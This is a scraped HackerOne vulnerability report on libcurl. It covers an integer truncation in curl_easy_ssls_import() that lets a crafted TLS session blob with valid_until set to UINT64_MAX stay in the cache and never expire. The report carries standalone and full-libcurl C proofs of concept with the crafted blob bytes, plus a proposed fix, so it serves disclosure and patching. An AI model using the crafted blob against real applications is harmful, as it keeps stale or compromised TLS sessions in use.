{“lastseen”:”2026-04-09T06:29:18″,”description”:”## Summary:\\n`curl_easy_ssls_import()` deserializes a TLS session blob and stores it in the in-memory session cache. In `Curl_ssl_session_unpack()` (`lib\/vtls\/vtls_spack.c:311`), the `valid_until` field is read as `uint64_t` and cast directly to `curl_off_t` (`int64_t`) with no bounds check \u2014 so a crafted blob encoding `valid_until = 0xFFFFFFFFFFFFFFFF` produces `valid_until = -1` after the cast. The import path (`Curl_ssl_session_import` \u2192 `cf_scache_peer_add_session`) stores the session directly, bypassing the `valid_until \\u003c= 0` reset that the normal add path (`cf_scache_add_session`) applies. The expiry predicate `(valid_until \\u003e 0) \\u0026\\u0026 (valid_until \\u003c now)` then evaluates `(-1 \\u003e 0) = FALSE`, so the session is never evicted from the cache. Additionally, `curl_easy_ssls_export()` returns `CURLE_BAD_FUNCTION_ARGUMENT` for this session (the pack side rejects `valid_until \\u003c 0`), leaving it permanently stuck in-memory yet still retrievable for TLS resumption via `Curl_ssl_scache_take()`.\\n\\n\\u003e **AI Disclosure:** This report was produced with AI assistance. All findings were verified by running the proof-of-concept against libcurl 8.19.0 source code.\\n\\n## Affected version\\n\\n“`\\nlibcurl\/8.19.0-DEV OpenSSL\/3.5.5 zlib\/1.3.1 brotli\/1.1.0 zstd\/1.5.7 nghttp2\/1.64.0\\nLinux x86_64\\nFeature gate: USE_SSLS_EXPORT (enabled by default with OpenSSL, GnuTLS, wolfSSL, mbedTLS)\\nIntroduced in: curl 8.12.0 (when curl_easy_ssls_import was added)\\n“`\\n\\n## Steps To Reproduce:\\n\\n### Option A \u2014 Standalone (no libcurl build required)\\n\\nCompiles and runs without any libcurl dependency. Proves the cast and expiry logic in isolation.\\n\\n“`c\\n\/\/ Save as poc_standalone.c\\n\/\/ Build: gcc -DSTANDALONE -o poc poc_standalone.c \\u0026\\u0026 .\/poc\\n#include \\u003cstdio.h\\u003e\\n#include \\u003cstdint.h\\u003e\\n#include \\u003ctime.h\\u003e\\n\\nstatic int expiry_check(int64_t valid_until, int64_t now) {\\n \/* exact copy of cf_scache_session_expired() \u2014 vtls_scache.c:501 *\/\\n return (valid_until \\u003e 0) \\u0026\\u0026 (valid_until \\u003c now);\\n}\\n\\nint main(void) {\\n int64_t now = (int64_t)time(NULL);\\n\\n \/* attacker sets VALID_UNTIL = 0xFFFFFFFFFFFFFFFF in blob *\/\\n uint64_t evil_u64 = 0xFFFFFFFFFFFFFFFFULL;\\n int64_t evil_i64 = (int64_t)evil_u64; \/* vtls_spack.c:311 \u2014 no check *\/\\n\\n printf(\\”val64 in blob : 0x%016llx\\\\n\\”, (unsigned long long)evil_u64);\\n printf(\\”valid_until : %lld (wraps to -1)\\\\n\\”, (long long)evil_i64);\\n printf(\\”(-1 \\u003e 0) : %s \u2192 session NEVER expires\\\\n\\”,\\n (evil_i64 \\u003e 0) ? \\”TRUE\\” : \\”FALSE\\”);\\n printf(\\”expired? : %s\\\\n\\”,\\n expiry_check(evil_i64, now) ? \\”YES\\” : \\”NO \u2190 BUG\\”);\\n return 0;\\n}\\n“`\\n\\n**Expected output:**\\n“`\\nval64 in blob : 0xffffffffffffffff\\nvalid_until : -1 (wraps to -1)\\n(-1 \\u003e 0) : FALSE \u2192 session NEVER expires\\nexpired? : NO \u2190 BUG\\n“`\\n\\n—\\n\\n### Option B \u2014 Full libcurl PoC\\n\\nRequires libcurl \u2265 8.12.0 built with `USE_SSLS_EXPORT`.\\n\\n**Crafted blob (24 bytes, TLV big-endian as defined in `vtls_spack.c`):**\\n“`\\n01 \u2190 CURL_SPACK_VERSION marker (0x01)\\n04 00 08 \u2190 CURL_SPACK_TICKET tag + uint16 length = 8\\nDE AD BE EF CA FE BA BE \u2190 8 bytes dummy ticket data\\n02 03 04 \u2190 CURL_SPACK_IETF_ID tag + uint16 = 0x0304 (TLS 1.3)\\n03 \u2190 CURL_SPACK_VALID_UNTIL tag\\nFF FF FF FF FF FF FF FF \u2190 uint64 big-endian = UINT64_MAX \u2192 int64 = -1\\n“`\\n\\n“`c\\n\/\/ Save as poc.c\\n\/\/ Build: gcc -o poc poc.c -lcurl \\u0026\\u0026 .\/poc\\n#include \\u003cstdio.h\\u003e\\n#include \\u003ccurl\/curl.h\\u003e\\n\\nstatic const unsigned char crafted_blob[] = {\\n 0x01,\\n 0x04, 0x00, 0x08, 0xde, 0xad, 0xbe, 0xef, 0xca, 0xfe, 0xba, 0xbe,\\n 0x02, 0x03, 0x04,\\n 0x03, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff\\n};\\n\\nint main(void) {\\n CURL *curl;\\n CURLSH *share;\\n CURLcode rc;\\n\\n curl_global_init(CURL_GLOBAL_DEFAULT);\\n\\n \/* share needed to initialise the TLS session cache (ssl_scache) *\/\\n share = curl_share_init();\\n curl_share_setopt(share, CURLSHOPT_SHARE, CURL_LOCK_DATA_SSL_SESSION);\\n\\n curl = curl_easy_init();\\n curl_easy_setopt(curl, CURLOPT_SHARE, share);\\n\\n rc = curl_easy_ssls_import(curl,\\n \\”example.com:443:G\\”, \/* global peer key *\/\\n NULL, 0,\\n crafted_blob, sizeof(crafted_blob));\\n\\n printf(\\”curl_easy_ssls_import: %d (%s)\\\\n\\”, rc, curl_easy_strerror(rc));\\n \/* Expected: 0 (No error) \u2014 blob accepted, session stored with valid_until=-1 *\/\\n\\n curl_easy_cleanup(curl);\\n curl_share_cleanup(share);\\n curl_global_cleanup();\\n return rc;\\n}\\n“`\\n\\n**Expected output (vulnerable build):**\\n“`\\ncurl_easy_ssls_import: 0 (No error)\\n“`\\n\\nThe session is now in the TLS cache with `valid_until = -1`. It survives every subsequent call to `cf_scache_peer_remove_expired()` because `(-1 \\u003e 0) = FALSE`. It is also un-exportable \u2014 `curl_easy_ssls_export()` returns `CURLE_BAD_FUNCTION_ARGUMENT` (43) for it because `Curl_ssl_session_pack()` rejects `valid_until \\u003c 0` \u2014 leaving it permanently irremovable while still being served to servers via `Curl_ssl_scache_take()`.\\n\\n—\\n\\n### Relevant source locations\\n\\n| File | Line | Note |\\n|——|——|——|\\n| `lib\/vtls\/vtls_spack.c` | 311 | `s-\\u003evalid_until = (curl_off_t)val64;` \u2014 missing bounds check |\\n| `lib\/vtls\/vtls_spack.c` | 199 | Pack side rejects `\\u003c 0`, unpack side does not |\\n| `lib\/vtls\/vtls_scache.c` | 501 | `(valid_until \\u003e 0) \\u0026\\u0026 (valid_until \\u003c now)` \u2014 negative bypasses |\\n| `lib\/vtls\/vtls_scache.c` | 796 | Normal add path resets `\\u003c= 0` \u2014 import path skips this |\\n| `lib\/vtls\/vtls_scache.c` | 1127 | Import calls `cf_scache_peer_add_session` directly, no reset |\\n\\n### Proposed fix\\n\\n“`c\\n\/* vtls_spack.c, after spack_dec64 call in CURL_SPACK_VALID_UNTIL case *\/\\nif(val64 \\u003e (uint64_t)CURL_OFF_T_MAX) {\\n r = CURLE_READ_ERROR;\\n goto out;\\n}\\ns-\\u003evalid_until = (curl_off_t)val64;\\n“`\\n\\n## Impact\\n\\nAn attacker who can write to the session blob passed to curl_easy_ssls_import() \u2014 for example by tampering with a session persistence file on disk \u2014 can inject a TLS session with valid_until = -1. This session is never evicted from the in-memory TLS cache (expiry check always FALSE) and cannot be cleaned up via re-export. If the injected ticket corresponds to a revoked or compromised TLS session, libcurl will continue offering it for TLS session resumption indefinitely, bypassing the intended expiry-based eviction. Applications most at risk are those that persist TLS sessions to disk across process restarts with weak file permission controls on the session store.”,”published”:”2026-04-08T13:18:59″,”modified”:”2026-04-09T05:49:37″,”type”:”hackerone”,”title”:”curl: libcurl: Integer truncation in curl_easy_ssls_import() causes TLS sessions to never expire”,”source”:””,”references”:””,”id”:”H1:3658049″,”bulletinFamily”:”bugbounty”,”cwe”:null,”cvelist”:[],”sourceData”:””,”sourceHref”:””,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/hackerone.com\/reports\/3658049″,”category_name”:”News”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-04-09T06:29:18″,”description”:”## Summary:\\n`curl_easy_ssls_import()` deserializes a TLS session blob and stores it in the in-memory session cache. In `Curl_ssl_session_unpack()` (`lib\/vtls\/vtls_spack.c:311`), the `valid_until` field is read as `uint64_t`…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[6,8,12,117,13,33,7,11,5],"class_list":["post-42812","post","type-post","status-publish","format-standard","hentry","category-category_news","tag-cve","tag-cvss","tag-exploit","tag-hackerone","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n